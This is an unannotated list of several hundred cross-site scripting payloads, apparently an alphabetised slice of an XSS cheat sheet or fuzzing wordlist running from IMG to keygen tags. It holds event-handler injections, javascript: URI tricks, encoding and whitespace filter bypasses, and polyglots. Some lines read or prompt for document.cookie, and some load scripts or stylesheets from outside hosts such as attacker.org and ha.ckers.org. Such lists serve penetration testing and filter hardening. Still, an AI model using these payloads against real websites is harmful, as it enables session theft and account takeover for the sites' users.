<IMG SRC=x onmousemove=”alert(String.fromCharCode(88,83,83))”>
<IMG SRC=x onmouseout=”alert(String.fromCharCode(88,83,83))”>
<IMG SRC=x onmouseover=”alert(String.fromCharCode(88,83,83))”>
<IMG SRC=x onmouseup=”alert(String.fromCharCode(88,83,83))”>
<IMG SRC=x onmousewheel=”alert(String.fromCharCode(88,83,83))”>
<IMG SRC=x onoffline=”alert(String.fromCharCode(88,83,83))”>
<IMG SRC=x ononline=”alert(String.fromCharCode(88,83,83))”>
<IMG SRC=x onpagehide=”alert(String.fromCharCode(88,83,83))”>
<IMG SRC=x onpageshow=”alert(String.fromCharCode(88,83,83))”>
<IMG SRC=x onpaste=”alert(String.fromCharCode(88,83,83))”>
<IMG SRC=x onpause=”alert(String.fromCharCode(88,83,83))”>
<IMG SRC=x onplay=”alert(String.fromCharCode(88,83,83))”>
<IMG SRC=x onplaying=”alert(String.fromCharCode(88,83,83))”>
<IMG SRC=x onpopstate=”alert(String.fromCharCode(88,83,83))”>
<IMG SRC=x onprogress=”alert(String.fromCharCode(88,83,83))”>
<IMG SRC=x onratechange=”alert(String.fromCharCode(88,83,83))”>
<img src=`x` onrerror= ` ;; alert(1) ` />
<IMG SRC=x onreset=”alert(String.fromCharCode(88,83,83))”>
<IMG SRC=x onresize=”alert(String.fromCharCode(88,83,83))”>
<IMG SRC=x onscroll=”alert(String.fromCharCode(88,83,83))”>
<IMG SRC=x onsearch=”alert(String.fromCharCode(88,83,83))”>
<IMG SRC=x onseeked=”alert(String.fromCharCode(88,83,83))”>
<IMG SRC=x onseeking=”alert(String.fromCharCode(88,83,83))”>
<IMG SRC=x onselect=”alert(String.fromCharCode(88,83,83))”>
<IMG SRC=x onshow=”alert(String.fromCharCode(88,83,83))”>
<IMG SRC=x onstalled=”alert(String.fromCharCode(88,83,83))”>
<IMG SRC=x onstorage=”alert(String.fromCharCode(88,83,83))”>
<IMG SRC=x onsubmit=”alert(String.fromCharCode(88,83,83))”>
<IMG SRC=x onsuspend=”alert(String.fromCharCode(88,83,83))”>
<IMG SRC=x ontimeupdate=”alert(String.fromCharCode(88,83,83))”>
<IMG SRC=x ontoggle=”alert(String.fromCharCode(88,83,83))”>
<IMG SRC=x onunload=”alert(String.fromCharCode(88,83,83))”>
<IMG SRC=x onvolumechange=”alert(String.fromCharCode(88,83,83))”>
<IMG SRC=x onwaiting=”alert(String.fromCharCode(88,83,83))”>
<IMG SRC=x onwheel=”alert(String.fromCharCode(88,83,83))”>
<img src=”x:o” title=”onerror=alert(1)//”>
<img src=x:prompt(eval(alt)) onerror=eval(src) alt=String.fromCharCode(88,83,83)>
<img src=”x` `<script>alert(1)</script>”` `>
<img src=”x` `<script>javascript:alert(1)</script>”` `>
<img src=xss onerror=alert(1)>
<img/src=”xss.png”alt=”xss”>
<img src=”x:? title=” onerror=alert(1)//”>
<img src=x\x09onerror=”javascript:alert(1)”>
<img src=x\x10onerror=”javascript:alert(1)”>
<img src=x\x11onerror=”javascript:alert(1)”>
<img src=x\x12onerror=”javascript:alert(1)”>
<img src=x\x13onerror=”javascript:alert(1)”>
<img src=”xx# onerror=alert(1)//{0xf09d8c86}”>
<![<img src=x:x onerror=`alert(/ @jackmasa /)//`] →
“><img src=”x:x” onerror=”alert(XSS)”>
‘><img/src=”x:x”/onerror=”confirm(1)”’><
<![<img src=x:x onerror=`confirm(2)//`] →
<img src=xx: onerror=confirm(document.location)>
<img src=”xx:x” alt=”``onerror=confirm(1)”><script>document.body.innerHTML+=’’</script>
“><img src=”xx:x” alt=”``onerror=confirm(1)”><script>document.body.innerHTML+=’’</script>
<! — `<img/src=xx:xx onerror=alert(1)// — !>
<img src=`xx:xx`onerror=alert(1)>
<img src=`xx:xx`onerror=confirm(1)>
<img src=`xx:xx` onerror=confirm(/XSS/.source);confirm(1)>
><img src=`xx:xx` onerror=confirm(/XSS/.source);confirm(1)>
“<img src=`xx:xx` onerror=confirm(/XSS/.source);confirm(1)>”
“\”><img src=`xx:xx` onerror=confirm(/XSS/.source);confirm(1)>”,
→<! — — -> <img src=xxx:x onerror=javascript:alert(1)> →
<img src=xx:xx onerror=window[[‘logChr*chr*’]](*num*)>
`”’><img src=xxx:x onerror\x00=javascript:alert(1)>
`”’><img src=xxx:x onerror\x09=javascript:alert(1)>
`”’><img src=xxx:x onerror\x0A=javascript:alert(1)>
`”’><img src=xxx:x onerror\x0B=javascript:alert(1)>
`”’><img src=xxx:x onerror\x0C=javascript:alert(1)>
`”’><img src=xxx:x onerror\x0D=javascript:alert(1)>
`”’><img src=xxx:x onerror\x20=javascript:alert(1)>
`”’><img src=xxx:x \x00onerror=javascript:alert(1)>
`”’><img src=xxx:x \x09onerror=javascript:alert(1)>
`”’><img src=xxx:x \x0Aonerror=javascript:alert(1)>
`”’><img src=xxx:x \x0Bonerror=javascript:alert(1)>
`”’><img src=xxx:x \x0Conerror=javascript:alert(1)>
`”’><img src=xxx:x \x0Donerror=javascript:alert(1)>
`”’><img src=xxx:x \x20onerror=javascript:alert(1)>
`”’><img src=xxx:x \x22onerror=javascript:alert(1)>
`”’><img src=xxx:x \x27onerror=javascript:alert(1)>
`”’><img src=xxx:x \x2Fonerror=javascript:alert(1)>
<IMG STYLE=’
<IMG STYLE_NeatHtmlReplace=”xss:expr/*XSS*/ession(alert(‘XSS’))”>
<img style=”xss:expression(alert(0))”>
<Img style = “xss: expression (alert (0))”>
<IMG STYLE=’xss:expre\ssion(alert(“X5SS”))’>
<IMG STYLE=”xss: expre\ssion(alert(“XSS”))”>
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
<;IMG STYLE=”;xss:expr/*XSS*/ession(alert(‘;XSS’;))”;>;
<IMG STYLE=”xss:expr/*XSS*/ession(alert(‘XSS’))”>
<IMG STYLE=”xss:expr/*XSS*/ession(alert(‘XSS’))”
<IMG STYLE=”xss:expr/*XSS*ession(alert(‘XSS’))”>
<IMG STYLE=”xss:expr/*XSS*/ession(confirm(document.location))”>
<img STYLE=”xss:expr/*XSS*/ession(document.vulnerable=true)”>
<IMG STYLE=”xss:expr/*XSS*/ession(javascript:alert(1))”>
<img =”=” title=”><img src=1 onerror=alert(1)>”
<img \x00src=x onerror=”alert(1)”>
<img \x00src=x onerror=”javascript:alert(1)”>
<img\x0bsrc=’1'\x0bonerror=alert(0)>
<;IMG&#x0D;SRC&#x0D;=&#x0D;”;&#x0D;j&#x0D;a&#x0D;v&#x0D;a&#x0D;s&#x0D;c&#x0D;r&#x0D;i&#x0D;p&#x0D;t&#x0D;:&#x0D;a&#x0D;l&#x0D;e&#x0D;r&#x0D;t&#x0D;&#x0D;’;&#x0D;X&#x0D;S&#x0D;S&#x0D;’;&#x0D;)&#x0D;”;&#x0D;>;&#x0D;
<img\x10src=x onerror=”javascript:alert(1)”>
<img \x11src=x onerror=”javascript:alert(1)”>
<img\x11src=x onerror=”javascript:alert(1)”>
<img \x12src=x onerror=”javascript:alert(1)”>
<img\x13src=x onerror=”javascript:alert(1)”>
<img\x32src=x onerror=”javascript:alert(1)”>
<img \x34src=x onerror=”javascript:alert(1)”>
<img \x39src=x onerror=”javascript:alert(1)”>
<img \x47src=x onerror=”javascript:alert(1)”>
<img\x47src=x onerror=”javascript:alert(1)”>
<img x/src=x /onerror=”x-\u0063onfirm(1)”>
import(‘da\r\nta:text/\ecmascript\,alert%601%60’)
import(‘data:text/javascript,alert(1)’)
<?import namespace=”t” implementation=”#default#time2">
<?import namespace=”t” implementation=”#default#time2"><t:set attributeName=”innerHTML” to=”XSS&lt;SCRIPT DEFER&gt;javascript:alert(1)&lt;/SCRIPT&gt;”></BODY></HTML>
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc">
<?import namespace=”xss” implementation=”http://ha.ckers.org/xss.htc">
@import url(http://attacker.org/malicious.css)
‘/(@import)/Usi’,
?injection=<script+&injection=>alert(1)></script>
Injection with GIF File as Source of Script (CSP Bypass)
innerHTML=document.title
innerHTML=innerText
innerHTML=location.hash>#<script>alert(1)</script>
/><input>
input1=<script/&in%u2119ut1=>al%u0117rt(‘1’)</script>
<input autofocus onblur=alert(1)>
<input autofocus onblur=alert(103)>
<input/autofocus/onfocus=
<input autofocus onfocus=alert(1)>
<input autofocus onfocus=alert(1)>//INJECTX
<input autofocus onfocus=confirm(1)>
<input/autofocus/onfocus=setTimeout(URL.slice(-7))//#alert()
<input formaction=JaVaScript:confirm(document.cookie)>
Input[hidden] XSS <input type=hidden style=`x:expression(alert(/ @garethheyes /))`> target it.
<input id=11 name=s value=`aa`onclick=alert(/xss/)>
<input id=x><input id=x><script>confirm(x)</script>
<input id=XSS onblur=javascript:eval(String[‘fromCharCode’](97,108,101,114,116,40,39,120,115,115,39,41,32)) autofocus><input autofocus>
<input id=XSS onfocus=javascript:eval(String[‘fromCharCode’](97,108,101,114,116,40,39,120,115,115,39,41,32)) autofocus>
<input name=PASSWORD_PARAMETER_NAME value=PASSWORD>
<input name=password value=logic>
<input name=USERNAME_PARAMETER_NAME value=USERNAME>
<input name=username value=brute>
<input onblur=alert(34) autofocus><input autofocus>
<input onblur=javascript:alert(1) autofocus><input autofocus>
<input onblur=write(XSS) autofocus><input autofocus>
<input onclick=popup=1; >
<input onfocus=alert(1337) </autofocus>
<input onfocus=”alert(1)” autofocus>
<input onfocus=alert(33) autofocus>
<><input onfocus=confirm(0) autofocus <! —
<input onfocus=javascript:alert(1) autofocus>
<input onfocus=popup=1; autofocus=”x”>
<InpuT/**/onfocus=pr\u006fmpt(1)%0Aautofocus>renwa
<input onfocus=write(1) autofocus>
<input onfocus=write(XSS) autofocus>
<input/onmouseover=”javaSCRIPT&colon;confirm&lpar;1&rpar;”
<input pattern=^((a+.)a)+$ value=aaaaaaaaaaaaaaa!>
<INPUT SRC=”javascript:alert(‘XSS’);”>
<input srcset=x href=x onclick=popup=1; >
<input style=”behavior: url(xss.txt)”>
</input/><svg><script>alert(1)//
</input/”><svg><script>alert(1)//
<INPUT TYPE=”BUTTON” action=”alert(‘XSS’)”/>
<INPUT+TYPE=”checkbox”+onDblClick=confirm(XSS)>
<input type=hidden name=comment>click me!</form>
<input type=hidden onformchange=confirm(1)/>
<input type=hidden style=`x:expression(confirm(1))`>
<input type=hidden style=`x:expression(confirm(4))`>
<input type=”image” dynid=XSS SRC=”javascript:alert(‘XSS’);”>
<INPUT TYPE=”image” DYNSRC=”javascript:alert(‘XSS’);”>
<input type=”image” dynsrc=”javascript:document.vulnerable=true;”>
<input type=”image” formaction=JaVaScript:alert(0)>
<Input type = “image” formaction = JaVaScript: alert (0)>
<INPUT TYPE=”IMAGE” id=XSS SRC=”javascript:alert(‘XSS’);”>
<INPUT+TYPE=”IMAGE”+SRC=”javascript:alert(1);”>
<;INPUT TYPE=”;IMAGE”; SRC=”;javascript:alert(‘;XSS’;);”;>;
<INPUT TYPE=”IMAGE” SRC=”javascript:alert(‘XSS’);”>
<INPUT TYPE=”IMAGE” SRC=”javascript:alert(‘XSS’);”>
<INPUT TYPE=”IMAGE” SRC=”javascript:alert(XSS);”>
<INPUT TYPE=IMAGE SRC=javascript:alert(XSS);>
<INPUT TYPE=”IMAGE” SRC=”javascript:confirm(document.location);”>
<input TYPE=”IMAGE” SRC=”javascript:document.vulnerable=true;”>
<INPUT TYPE=”IMAGE” SRC=”javascript:javascript:alert(1);”>
<input/type=”image”/value=””`<span/onmouseover=’confirm(1)’>X`</span>
<input type=”search” onsearch=”aler\u0074(1)”>
<input type=”text” name=”a”
<input type=”text” name=”foo” value=””autofocus/onfocus=alert(1)//”>
<input type=”text” name=”text”> <input type=”submit” onclick=”waf”>
<input type=”text” value=``<div/onmouseover=’alert(1)’>X</div>
<input type=”text” value=`` <div/onmouseover=’alert(1)’>X</div>
<input type=”text” value=``<div/onmouseover=’confirm(1)’>X</div>
<input type=”text” value=`` <div/onmouseover=’confirm(1)’>X</div>
<input type=’text’ value=’jaVasCript:/*-/*`/*\`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e’></input>
<input type=”text” value=”jaVasCript:/*-/*`/*\`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e”></input>
<input type=text value=jaVasCript:/*-/*`/*\`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e></input>
<input type=”text”value=””onclick=”location=window[`atob`]`amF2YXNjcmlwdDphbGVydChkb2N1bWVudC5kb21ha W4p`”/>
<input type=”text”value=””onclick=”location=window[`atob`]`amF2YXNjcmlwdDphbGVydChkb2N1bWVudC5kb21haW4p`”/>
<input type=”text” value=””onfocus=location=’javascript:alert`1`’ autofocus””/>
<input type=”text” value=””onresize=pompt(1) “>
<input type=”text” value=””onresize=pompt(1) “> // IE 10 docmode
<input type=”text” value=””><script>alert(1)//”><script type=”text/javascript”> function x(){ do something }</script>
<input value:aa/onclick=alert(/xss/)>
<input value=”${alert(1)}`</script/”>
<! — — !><input value=” →<body/onload=`alert(/ @jackmasa /)//`”>
<! — — !><input value=” →<body/onload=`alert(/ @jackmasa /)//`”>
<! — — !><input value=” →<body/onload=`confirm(4)//`”>
<input value=<><iframe/src=javascript:confirm(1)
“><input value=<><iframe/src=javascript:confirm(1)
<input value=”INPUT”>
<input value=INPUT>
<input value=””onfocus=alert(9)//”>
<input value=’’onfocus=alert(9);a=’’>
<input value=”<script>alert(1)</script>” `/>
<input value=”><script src=data:%26comma;alert(1)-”>
<input value=””><script src=data:%26comma;alert(1)-””>
<input value=”XSStest” type=text>
<Input value = “XSS” type = text>
<i onclick=alert(1)>Click here</i>
<i/onclick=URL=name>
io.swf?yid=\”));}catch(e){alert(1);}//
(?i)([\s\”’`;\/0–9\=]+on\w+\s*=)
i><<script>alert(document.cookie);//<</script>
i><ScRiPt>alert(document.cookie)</script>
i.setAttribute(name, follow);
i.setAttribute(type, hidden);
( is html encoded to &#40
) is html encoded to &#41
i><si%2bicript>alert(document.cookie)</script>
<isindex action=data:text/html, type=image>
<isindex action=javascript:alert(166) type=submit value=click>
<isindex action=”javascript:alert(1)” type=image>
<isindex action=javascript:alert(1) type=image>
<isindex action=”javascript:alert(1)” type=image> // Firefox, IE
<isindex action=javascript:alert(1) type=submit value=click> *
<isindex action=javascript:alert(1) type=submit value=click>
<isindex action=javascript:alert(1) type=submit value=click>
<isindex action=javascript:alert(32) type=image>
<isindex action=”javas&tab;cript:alert(1)” type=image>
<isindex action=”javas&Tab;cript:alert(1)” type=image>
<isindex action=”javas&Tab;cript:confirm(1)” type=image>
“><isindex action=”javas&Tab;cript:confirm(1)” type=image>
“/><isindex action=”javas&Tab;cript:confirm(1)” type=image>
<isindex action=”javas&Tab;cript:confirm(document.cookie)” type=image>
<isindex action=j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1) type=image>
<isindex action=j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1) type=image> Google Chrome, IE
<isindex/**/alt=1+src=renwa:window[‘alert’]/**/(alt)+type=image+onerror=while(true){eval(src)}>
<isindex/autofocus/onfocus=alert()>
<isindex formaction=javascript:alert(171) type=submit value=click>
<isindexformaction=”javascript:alert(1)” type=image>
<isindexformaction=”javascript:alert(1)” type=image>
<Isindexformaction = “javascript: alert (1)” type = image>
<isindex formaction=javascript:alert(1) type=submit value=click> *
<isindex formaction=javascript:alert(1) type=submit value=click>
<isindex formaction=javascript:alert(1) type=submit value=click>
<isindex formaction=javascript:confirm(1)>
<isindex type=image src=1 onerror=alert(1)>
<isindex+type=image+src=1+onerror=alert(1)>
<isindex type=image src=1 onerror=alert(31)>
<isindex type=image src=1 onerror=alert(XSS)>
<isindex x=”javascript:” onmouseover=”alert(1)” label=”test”>
<isindex x=”javascript:” onmouseover=”alert(1)” label=”test”> // Firefox, IE
<isindex x=”javascript:” onmouseover=”alert(XSS)”>
i\{\<\/\s\t\y\le\>\<\i\m\g\20\o\ne\r\r\o\r\=\’a\le\r\t\(d\oc\u\me\nt\.c\o\o\kie\)\’\s\rc\=\’eeeeeee\’\20\>{
<i style=x:expression(alert(URL=1))>
<i/style=x=x/**/(confirm(1))(‘\’)expression\’)>
<i/style=x=x/**/n(confirm(1))(‘\’)expressio\’)>
<i\x00mg src=’1' onerror=alert(0) />
<j 1=”*/””-alert(1)<!V onclick=location=innerHTML%2bouterHTML>javascript:/*click me!
<j 1=*/-alert(1)<!V onclick=location=innerHTML%2bouterHTML>javascript:/*click me!
*/<j 1=-alert(9)// onclick=location=innerHTML%2bpreviousSibling.nodeValue%2bouterHTML>javascript:/*click me!
*/”<j 1=-alert(9)// onclick=location=innerHTML%2bpreviousSibling.nodeValue%2bouterHTML>javascript:/*click me!
*/”<j 1=-alert(9)// onclick=location=innerHTML+previousSibling.nodeValue+outerHTML>javascript:/*click me!
<j%26p=<svg%2Bonload=alert(1) onclick=location%2B=outerHTML>click me!
*/<j-alert(1)<!V onclick=location=innerHTML%2bpreviousSibling.nodeValue%2bouterHTML>javascript:/*click me!
*/”<j”-alert(1)<!V onclick=location=innerHTML%2bpreviousSibling.nodeValue%2bouterHTML>javascript:/*click me!
*/”<j”-alert(9)<! — onclick=location=innerHTML+previousSibling.nodeValue+outerHTML>javascript:/*click me!
java&#0000000000000000115;cript:name
java%09script:alert(1)
java%0ascript:alert(1)
java%0dscript:alert(1)
Javas%26%2399;ript:alert(1)
javas&#99ript:alert(1)
Javas&#99;ript:alert(1)
javascr%0d%0aipt%3Aalert.call(this,%20document.domain)
javascript:/* —
javascript:([,?,,,,?]=[]+{},[?,?,?,?,,?,?,?,,,?]=[!!?]+!?+?.?)[?=?+?+?+?+?+?+?+?+?+?+?][?](?+?+?+?+?+’(-~?)’)()
javascript & # 00058; alert (1)
javascript&#00058;confirm(1)
jaVasCript:/*-/*`/*\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/ — !&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e
javascript&#058;alert(1)
javascript&#09;:alert(1)
javascript://%0Aalert(1)
javascript://%0aalert(1) or javascript://%250aalert(1)
javascript:1/*click me!*/ + <alert(1)<! — K </alert(1)<! — →
javascript:1/*click me!*/ + <alert(1)<!V onclick=location=innerHTML%2bouterHTML>
javascript://%250Aalert(document.cookie)
javascript://%250Aalert(document.location=”https://google.com",document.location="https://www.facebook.com")
javascript:’\74\163\166\147\40\157\156\154\157\141\144\75\141\154\145\162\164\50\61\51\76'
“javascript:alert(0)”></param></object>
?javascript:alert(1)”,
javas + cript: + -alert(1)
javas + cript: + ale + rt + ( + 1 + )
javas + cript: + ale + rt + (1)
javas + cript:” + “-alert(1)
javascrip + t:alert(1)
javascript: + -alert(1)
javascript:” + “-alert(1)
javascript:alert(1);
javascript:alert(1)//
javascript:alert(1)
JaVaScRipT: alert (1)
JaVaScRipT:alert(1)
JavaSCript:alert(123)
javascript:alert(1)//INJECTX
<javascript:alert(1) onclick=location=tagName>click me! <== doesn’t work! So…
javascript:alert%281%29;
javascript:alert%281%29
javascript:alert(document.domain);
javascript:alert(“hellox worldss”)
javascript:alert&lpar;1&rpar;
javascript:alert&lpar;document&period;cookie&rpar; // AsharJaved
javascript:alert()// →</script></textarea></style></title><a”//’ onclick=alert()//>*/alert()/*
javascript:alert()//<svg/onload=alert()>’-alert(“-alert()-”)-’
javascript://anything%0D%0A%0D%0Awindow.alert(1)
javas + cript:’click me! + #’-alert(1)
javas + cript:”click me! + #”-alert(1)
javas + cript:click me! + #-alert(1)
javascrip + t:’click me! + #’-alert(1)
javascrip + t:”click me! + #”-alert(1)
javascrip + t:click me! + #-alert(1)
javascript + :’click me! + #’-alert(1)
javascript + :”click me! + #”-alert(1)
javascript + :click me! + #-alert(1)
javascript: + /*click me! + #*/alert(1)
javascript: +click me! + #-alert(1)
javascript + :”-’click me! + http://..."-'click me</javascript>#’-alert(1)
javas + cript:-click me! + http://domain/page?p=%3Cjavas%20onclick=location=tagName%2binnerHTML%2bURL%3Ecript:-click me!</javas>#-alert(1)
javas + cript:”-’click me! + http://domain/page?p=<javas%20onclick=location=tagName%2binnerHTML%2bURL>cript:"-'click me!</javas>#’-alert(1)
javascript:-click me! + http://domain/page?p=<j onclick=location=innerHTML%2bURL>javascript:-click me!</j>#-alert(1)
javascript:”-’click me! + http://domain/page?p=<j onclick=location=innerHTML%2bURL>javascript:”-’click me!</j>#’-alert(1)
javascript:/*click me! + <j 1=”*/””-alert(1)<! — K
javascript:/*click me! + */” + <j 1=”-alert(9)//” …
javascript:/*click me! + */” + <j”-alert(9)<! — …
javascript:/*click me! + */ + <x 1= -alert(9)// onclick=location=innerHTML%2bpreviousSibling.nodeValue%2bouterHTML>
javascript:/*click me! + */” + <x 1=” -alert(9)//” onclick=location=innerHTML%2bpreviousSibling.nodeValue%2bouterHTML>
javascript:/*click me! + */ + <x-alert(9)<!V onclick=location=innerHTML%2bpreviousSibling.nodeValue%2bouterHTML>
javascript:/*click me! + */” + <x”-alert(9)<!V onclick=location=innerHTML%2bpreviousSibling.nodeValue%2bouterHTML>
javascript&colon;alert(1)
javaSCRIPT & colon; alert (1)
javaSCRIPT&colon;alert(1)
javaSCRIPT&colon;confirm(1)
;})javascript:confirm(0);
;javascript:confirm(0);
“javascript:confirm(0);”,
javascript:confirm(0);
javascript:confirm(1)//
JaVaScRipT:confirm(1)
JaVAscRIPT:confirm(4)
javascript:confirm(7)//://svg
javascript:confirm&lpar�A1&rpar�A
javascript:c=String.fromCharCode;alert(c(83)+c(117)+c(109)+c(79)+c(102)+c(80)+c(119)+c(110)+c(46)+c(110)+c(108))
javascript:document.cookie=window.prompt(“edit cookie:”,document.cookie);void(0);
javascript:document.scripts[0].src=’http://127.0.0.1/yy.js';void(0);
javascript:document.write(“<script src=xxx></script>”)
javascript:document.write(unescape(‘<script src=”http://www.xxxx.com/x.js"></script>'));
javascript:%E2%80%A8alert`1`
javascript:eval(unescape(location.href))
javascript:HTMLDocument.__proto__.__defineSetter__(“prototype”,function(){try{d.d.d}catch(e){confirm(e.stack)}})
javascript: + http://domain/page?p=<javascript: onclick=location=tagName%2bURL>click me!#%0Aalert(1)
javascript:- + http://domain/page?p=<javascript:- onclick=location=tagName%2bURL>click me!#-alert(1)
javascript:”-’ + http://domain/page?p=<javascript:"-' onclick=location=tagName%2bURL>click me!#’-alert(1)
javas + cript: + http://domain/page?p=<javas onclick=location=tagName%2binnerHTML%2bURL>cript:</javas>#%0Aalert(1)
javascript: + http://domain/page?p=<j onclick=location=innerHTML%2bURL>javascript:</j>#%0Aalert(1)
javascripT://https://google.com%0aalert(1);//https://google.com
<javascript id=:alert(195) onmouseover=location=tagName%2Bid>00000
<javascript id=:alert%26%2340;39%26%2341 onmouseover=location=tagName%2Bid>00000
<javascript id=:alert(38) onmouseover=location=tagName%2Bid>00000
<javascript id=:alert&#40;193&#41 onmouseover=location=tagName+id>00000
<javascript id=:alert&lpar;194&rpar; onmouseover=location=tagName+id>00000
javascript:/* + <j 1=”*/””-alert(1)<!V onclick=location=innerHTML%2bouterHTML>
javascript:/* + <j 1=*/-alert(1)<!V onclick=location=innerHTML%2bouterHTML>
javascript = j&#x00041vascr&#x00069pt
Javascript = j&#x00041vascr&#x00069pt
jaVasCript:/*-/*`/*`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>
jaVasCript:/*-/*`/*\`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert(1)//>\x3e
<! — jaVasCript:/*-/*`/*\`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e →
jaVasCript:/*-/*`/*\`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e
jaVasCript:/*-/*`/*\`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e
<javascript: onclick=alert(tagName%2BinnerHTML%2Blocation.hash)>/*click me!#*/alert(1)
<javascript: onclick=alert(tagName%2BinnerHTML%2Blocation.hash)>’click me!</javascript:>#’-alert(1)
<javascript: onclick=alert(tagName%2BinnerHTML%2Blocation.hash)>click me!</javascript:>#-alert(1)
<javascript onclick=alert(tagName%2Blocation.hash)>click me!#:alert(1)
<javascript: onclick=alert(tagName%2Blocation.hash)>click me!#alert(1)
<javascript onclick=alert(tagName)>click me!
jaVasCript:, oNcliCk=, et al.
<javascript: onclick=location=tagName%2BinnerHTML%2Blocation.hash>/*click me!#*/alert(1)
<javascript: onclick=location=tagName%2BinnerHTML%2Blocation.hash>’click me!#’-alert(1)
<javascript: onclick=location=tagName%2BinnerHTML%2Blocation.hash>click me!#-alert(1)
<javascript onclick=location=tagName%2binnerHTML%2blocation.hash>:/*click me!#*/alert(9)
<javascript onclick=location=tagName%2binnerHTML%2blocation.hash>:’click me!#’-alert(9)
<javascript onclick=location=tagName%2binnerHTML%2blocation.hash>:click me!#-alert(9)
<javascript: onclick=location=tagName%2bURL>click me!#%0Aalert(1)
<javascript:- onclick=location=tagName%2bURL>click me!#-alert(1)
<javascript:”-’ onclick=location=tagName%2bURL>click me!#’-alert(1)
<javascript onclick=location=tagName+innerHTML+location.hash>:/*click me!
<javascript onclick=location=tagName+innerHTML+location.hash>:/*click me!#*/alert(1)
<javascript onclick=location=tagName+innerHTML+location.hash>:’click me!#’-alert(1)
<javascript onclick=location=tagName+innerHTML+URL>:”-’click me!</javascript>#’-alert(1)
<javascript onclick=location=tagName+location.hash(1)>click me!#:alert(1)
<javascript: onclick=location=tagName+URL>click me!#%0Aalert(1)
<javascript:”-’ onclick=location=tagName+URL>click me!#’-alert(1)
javascript:prompt(1)#{“action”:1}
“javascript:prompt(/compaXSS/.source);var x = prompt;x(0);x(/XSS/.source);x”
/”/_javascript:prompt(/xss/.source);var x = prompt;x(0);x(/XSS/.source);x
javascript:prompt(/XSS/.source);var x = prompt;x(0);x(/XSS/.source);x
javascript:propmpt(1)
javascript:// →</script></title></style>”/</textarea>*/<alert()/*’ onclick=alert()//>a
javascript:/* →]]>%>?></script></title></textarea></noscript></style></xmp>”>[img=1,name=/alert(1)/.source]<img — /style=a:expression&#40&#47&#42'/- /*&#39,/**/eval(name)/*%2A///*///&#41;;width:100%;height:100%;position:absolute;-ms- behavior:url(#default#time2) name=alert(1)onerror=eval(name) src=1 autofocus onfocus=eval(name) onclick=eval(name) onmouseover=eval(name) onbegin=eval(name) background=javascript:eval(name)//>”
‘/(javascript\s*:)/Usi’,
javascript<TAB>:alert(1)
javascript://’//” →</textarea></style></script></title><b onclick= alert()//>*/alert()/*
javascript://</title>”/</script></style></textarea/ →*/<alert()/*’ onclick=alert()//>/
javascript://</title></style></textarea> →</script><a”//’ onclick=alert()//>*/alert()/*
javascript://’/</title></style></textarea></script> →<p” onclick=alert()//>*/alert()/*
javascript:// →</title></style></textarea></script><svg “//’ onclick=alert()//
javascript:/* →</title></style></textarea></script></xmp><svg/onload=’+//+/onmouseover=1/+/[*/[]/+alert(1)//’>
javascript:/* →</title></style></textarea></script></xmp><svg/onload=’+/”/+/onmouseover=1/+/[*/[]/+alert(1)//’>
javascript://</title></textarea></style></script →<li ‘//” ‘*/alert()/*’, onclick=alert()//
javascript:\u0061lert(1)
javascript: \ u0061lert & # x28; 1 ??& # x29
javascript:\u0061lert&#x28;1&#x29
(javascript:window.onerror=confirm;throw%20document.cookie)
javascript&#x3A;alert&lpar;document&period;cookie&rpar;
javascript&#x3A;confirm&lpar;document&period;cookie&rpar;
<javas onclick=location=tagName%2binnerHTML%2bURL>cript:-click me!</javas>#-alert(1)
<javas onclick=location=tagName%2binnerHTML%2bURL>cript:”-’click me!</javas>#’-alert(1)
<javas onclick=location=tagName%2binnerHTML%2bURL>cript:</javas>#%0Aalert(1)
<javas onclick=location=tagName+innerHTML+URL>cript:”-’click me!</javas>#’-alert(1)
<javas onclick=location=tagName+innerHTML+URL>cript:</javas>#%0Aalert(1)
javas + script: + ale + rt + (1)
javas & Tab; cript: \ u0061lert (1);
javas&Tab;cript:\u0061lert(1);
java&#x000000000000000073;cript:name
j&NewLine;a&NewLine;vas&NewLine;cript:confirm(1);
<j onclick=location%2B=textContent>%26p=%26lt;svg/onload=alert(1)>
<j onclick=location=innerHTML%2bURL>javascript:-click me!</j>#-alert(1)
<j onclick=location=innerHTML%2bURL>javascript:”-’click me!</j>#’-alert(1)
<j onclick=location=innerHTML%2bURL>javascript:</j>#%0Aalert(1)
<j onclick=location=innerHTML>javascript%26colon;alert(1)//
<j onclick=location=innerHTML>javascript&colon;alert(1)//
<j onclick=location=innerHTML+URL>javascript:”-’click me!</j>#’-alert(1)
<j onclick=location=innerHTML+URL>javascript:</j>#%0Aalert(1)
<j onclick=location=textContent>?p=%26lt;svg/onload=alert(1)>
$(‘ jqueryselector’).append(‘some text to append’);
JSON.parse(‘{“__proto__”:[“a”,1]}’)
JSP a = val1
<keygen autofocus onfocus=alert(1)>
